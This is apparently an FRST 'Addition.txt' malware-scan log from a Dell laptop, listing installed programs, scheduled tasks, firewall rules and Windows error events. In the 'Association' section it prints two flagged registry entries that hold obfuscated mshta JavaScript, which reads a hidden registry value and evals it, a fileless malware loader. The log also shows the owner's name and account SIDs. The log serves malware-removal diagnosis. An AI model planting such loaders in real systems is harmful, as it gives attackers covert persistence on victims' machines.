Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.)
Dell Customer Connect (HKLM-x32\...\{2A07BB79-284C-4C61-B8D5-4E146FAC91FB}) (Version: 1.0.0.8 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Foundation Services (HKLM\...\{AE5E3C86-2633-4DAF-A7F4-C43D1E738BAE}) (Version: 3.1.3300.0 - Dell Inc.)
Dell Product Registration (HKLM-x32\...\{17FFE63C-6734-4950-B488-134B5A2505F7}) (Version: 2.04.0280 - Aviata Inc.)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.1.34.40 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 0.9.0 - Dropbox, Inc.)
DSC/AA Factory Installer (Version: 3.5.6426.22 - PC-Doctor, Inc.) Hidden
DW WLAN Card (HKLM\...\DW WLAN Card) (Version: 6.30.223.249 - Dell Inc.)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3945 - Intel Corporation)
McAfee AntiVirus (HKLM-x32\...\MSC) (Version: 14.0.9042 - McAfee, Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
My Dell Learning Center (HKLM\...\{DC451A89-545E-4297-AC2C-9F239CE7D695}) (Version: 1.0.510.0 - Dell Inc.)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.18 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9600.39054 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7288 - Realtek Semiconductor Corp.)
WIDCOMM Bluetooth Software (HKLM\...\{C6D9ED03-6FCF-4410-9CB7-45CA285F9E11}) (Version: 12.0.0.9980 - Broadcom Corporation)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll => No Fil (the data entry has 1 more characters).
CustomCLSID: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Melinda\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe => No File
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {2362FB59-156D-4BDE-BDE5-26155C688609} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-07-05] (Realtek Semiconductor)
Task: {31B9C7D7-07AF-4C60-8D5C-22F4E164D916} - System32\Tasks\McAfee\McAfee Idle Detection Task
Task: {35276823-28FA-4B1D-A581-AEFDA66847C0} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2013-03-22] (CyberLink Corp.)
Task: {3758DF87-0E29-486A-9D29-63718D338695} - System32\Tasks\Dell\Dell Product Registration Update => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {3F26D171-C361-4616-B754-E0147B333FF5} - System32\Tasks\Dell\Dell Product Registration => C:\Program Files (x86)\Dell Product Registration\prodreg.exe [2014-04-01] (Aviata Inc)
Task: {583C724D-DC81-4886-9B12-752F09269FF2} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\mcafee\platform\McUICnt.exe [2016-04-23] (McAfee, Inc.)
Task: {6FE5AA89-8DE2-40BA-B60E-9AED6F64693F} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {7FFABFC7-6E75-48D4-80F9-F8C8DD52D5AF} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {B4B694C2-6A51-4D72-BA7B-BEEBAD2B8856} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2013-03-05] (CyberLink)
Task: {DA28AAC1-0DC1-4DFD-ACF4-024C75A6E47E} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-11] (PC-Doctor, Inc.)
Task: {DD6537A5-A686-4071-B1C0-3AB7EE5B2110} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [2016-03-31] (McAfee, Inc.)
Task: {EC51E01A-E785-4E5F-848B-388C16A74DCC} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-01-10] (Synaptics Incorporated)
Task: {F3895D47-C5D5-4BA6-8A33-293D270553E0} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\Windows\TEMP\DeleteFolderTask.exe [2016-07-06] () <==== ATTENTION
Task: {FFE8401F-7883-442B-944A-693A8A7FE7B7} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2014-09-24 22:20 - 2014-09-24 22:20 - 00049408 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btwleapi.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00022528 _____ () C:\Program Files\Dell\My Dell Learning Center\MDLCSvc.exe
2015-01-22 23:37 - 2015-01-22 23:37 - 06032384 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.BeautyShot.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00045568 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.Agent.Plugins.ContentManager.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017408 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00009728 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.ContentManager.Configuration.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00017920 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Common.dll
2015-01-22 23:37 - 2015-01-22 23:37 - 00006656 _____ () C:\Program Files\Dell\My Dell Learning Center\Dell.Tribbles.BeautyShot.Configuration.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00462160 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
2015-06-07 15:06 - 2013-12-10 17:27 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00214352 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\Ledger.dll
2014-09-02 18:40 - 2014-09-02 18:40 - 00114000 _____ () C:\Program Files (x86)\Dropbox\DropboxOEM\zlib1.dll
2015-06-07 14:58 - 2013-03-05 05:40 - 00626240 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll
2013-03-05 18:41 - 2013-03-05 18:41 - 00015424 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll
2015-03-16 11:28 - 2015-03-16 11:28 - 00155528 _____ () C:\Program Files (x86)\Dell Digital Delivery\ServiceTagPlusPlus.dll
2016-01-05 19:17 - 2015-12-19 01:52 - 01607920 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
2015-06-07 15:20 - 2012-11-26 05:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
2015-06-07 15:19 - 2014-02-18 21:12 - 00117568 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
==================== Alternate Data Streams (Whitelisted) =========
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Classes\2c6da: "C:\Windows\system32\mshta.exe" "javascript:XB32SHUaV="5u2FH";lG0=new ActiveXObject("WScript.Shell");nsW7srGo="L";jwIb4=lG0.RegRead("HKCU\\software\\fokfinshfo\\kblbsn");IgzjC4k6x="nxybEpT4";eval(jwIb4);bD5aKS7="pjTk";" <===== ATTENTION
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Software\Classes\2e912: "C:\Windows\system32\mshta.exe" "javascript:uWaA9="Jopk0";Z9X=new ActiveXObject("WScript.Shell");yaIgQo4m="MVEsZ";hGX5P=Z9X.RegRead("HKCU\\software\\fokfinshfo\\kblbsn");GxfSc3J="aBFn";eval(hGX5P);fpt5V8hJp="pQBvV";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\...\webcompanion.com -> hxxp://webcompanion.com
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3305678368-1645044794-3837945535-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\dell\BlueLava_1112000xx_inspiron_wallpaper58095_16x9_72dpi_RGB.jpg
DNS Servers: 192.168.43.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
(Currently there is no automatic fix for this section.)
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{4C08EABD-F39F-4DFE-BC62-A885074076A0}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B1AEF5A5-BC60-420F-91A2-C4667097F18D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD12\Movie\PowerDVD Cinema\PowerDVDCinema12.exe
FirewallRules: [{19E3C5FD-7368-411F-B10B-7BEF913EB8AE}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{B3B5A316-3040-4953-B2BE-76A614395690}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{D7B1A2E0-AA3B-4786-B557-351B04116EEE}] => (Allow) C:\Users\Melinda\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{D8426297-B91F-4EA5-B90C-961F0D036FEF}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
FirewallRules: [{453DE781-1C77-4A11-9241-94E64E7C2586}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{15B1885B-E1A4-4E9F-95EE-072770B3A83F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{01D1F782-0259-4566-A237-B192FAF6E7F0}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{13FB821E-9FEE-4A0F-8DE3-9387CB447704}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EC9FA691-E063-4647-BC4A-4767178AC238}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{A75DB17C-A945-438F-ACCF-FF579716F5F1}] => (Allow) C:\Program Files (x86)\BitComet\BitComet.exe
FirewallRules: [{F7E58AA9-6B4D-41E1-BDAC-75A0FC8DA9BD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{F9AEAE24-EC5B-4EB5-A672-C5E2F0DC979A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B00CC2B1-DB54-432A-A099-3EE6AC06DCA0}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{A6643D8F-FF92-4964-AC6A-905B1D49FF70}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{6566F34D-CE0D-46FA-8939-42F3C461B65E}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [{58CDD88C-012F-47C2-8B07-68319DE5DB71}] => (Allow) C:\Program Files\BitComet\BitComet.exe
FirewallRules: [TCP Query User{161CA715-DC23-4B44-B509-22AAE82DD6FB}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [UDP Query User{CBF9CD12-1F76-4583-AA64-B05AFF1110F8}C:\program files (x86)\kodi\kodi.exe] => (Allow) C:\program files (x86)\kodi\kodi.exe
FirewallRules: [{59F538D1-BD40-4AAD-8FAC-ABA0A4531DE0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{D777539B-2BA0-4B86-9B02-67EC1BD7FEF0}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{4610417F-63B7-47E2-8499-00D1BD39C1A1}] => (Allow) LPort=17061
FirewallRules: [{4FA72F00-0BC4-4FB5-9F0A-3424AA44D5B6}] => (Allow) LPort=17061
FirewallRules: [{8343E0A9-1541-4C05-8336-8E24C926455D}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{1D0FED7E-B603-43E3-B728-90DE466D8BF1}] => (Allow) C:\Windows\explorer.exe
FirewallRules: [{B448FF33-50E1-430E-A442-F801742453A7}] => (Allow) C:\Windows\system32\rundll32.exe
==================== Restore Points =========================
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (07/06/2016 07:55:55 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: IEXPLORE.EXE, version: 11.0.9600.17416, time stamp: 0x5452eed9
Faulting module name: Flash.ocx, version: 16.0.0.305, time stamp: 0x54d010d8
Exception code: 0xc0000005
Fault offset: 0x003379bf
Faulting process id: 0x2b8
Faulting application start time: 0xIEXPLORE.EXE0
Faulting application path: IEXPLORE.EXE1
Faulting module path: IEXPLORE.EXE2
Report Id: IEXPLORE.EXE3
Faulting package full name: IEXPLORE.EXE4
Faulting package-relative application ID: IEXPLORE.EXE5
Error: (07/06/2016 07:50:45 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: 80070005
Error: (07/06/2016 06:32:13 AM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80040d07, "mapi15://{S-1-5-21-3305678368-1645044794-3837945535-1001}/">.
Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 7042) (User: )
Description: The Windows Search Service is being stopped because there is a problem with the indexer: The catalog is corrupt.
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 7040) (User: )
Description: The search service has detected corrupted data files in the index {id=4400}. The service will attempt to automatically correct this problem by rebuilding the index.
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 7010) (User: )
Description: The index cannot be initialized.
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 3058) (User: )
Description: The application cannot be initialized.
Context: Windows Application
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Error: (07/06/2016 06:31:38 AM) (Source: Windows Search Service) (EventID: 3028) (User: )
Description: The gatherer object cannot be initialized.
Context: Windows Application, SystemIndex Catalog
Details:
The content index catalog is corrupt. (HRESULT : 0xc0041801) (0xc0041801)
Error: (07/06/2016 06:31:37 AM) (Source: Windows Search Service) (EventID: 3029) (User: )
Description: The plug-in in <Search.TripoliIndexer> cannot be initialized.
Context: Windows Application, SystemIndex Catalog
Details:
The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)
Error: (07/06/2016 06:31:36 AM) (Source: Windows Search Service) (EventID: 3057) (User: )
Description: The plug-in manager <Search.TripoliIndexer> cannot be initialized.
Context: Windows Application
Details:
(HRESULT : 0x8e5e0713) (0x8e5e0713)
System errors:
=============
Error: (07/06/2016 08:47:45 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {1B1F472E-3221-4826-97DB-2C2324D389AE}
Error: (07/06/2016 08:47:15 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}
Error: (07/06/2016 08:17:45 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}
Error: (07/06/2016 08:17:15 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {209500FC-6B45-4693-8871-6296C4843751}
Error: (07/06/2016 08:17:15 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Interactive Services Detection service terminated with the following error:
%%1 = Incorrect function.
Error: (07/06/2016 08:16:48 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Interactive Services Detection service terminated with the following error:
%%1 = Incorrect function.
Error: (07/06/2016 08:13:00 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The McAfee Boot Delay Start Service service failed to start due to the following error:
%%1053 = The service did not respond to the start or control request in a timely fashion.
Error: (07/06/2016 08:13:00 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the McAfee Boot Delay Start Service service to connect.
Error: (07/06/2016 08:12:19 AM) (Source: DCOM) (EventID: 10010) (User: Mel)
Description: {209500FC-6B45-4693-8871-6296C4843751}
Error: (07/06/2016 06:45:12 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
==================== Memory info ===========================
Processor: Intel® Core i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 52%
Total physical RAM: 4000.18 MB
Available physical RAM: 1910.27 MB
Total Virtual: 4896.18 MB
Available Virtual: 2464.95 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:922.04 GB) (Free:889.71 GB) NTFS
Drive w: (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.4 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: E2DE1C3A)
Partition: GPT.
==================== End of Addition.txt ============================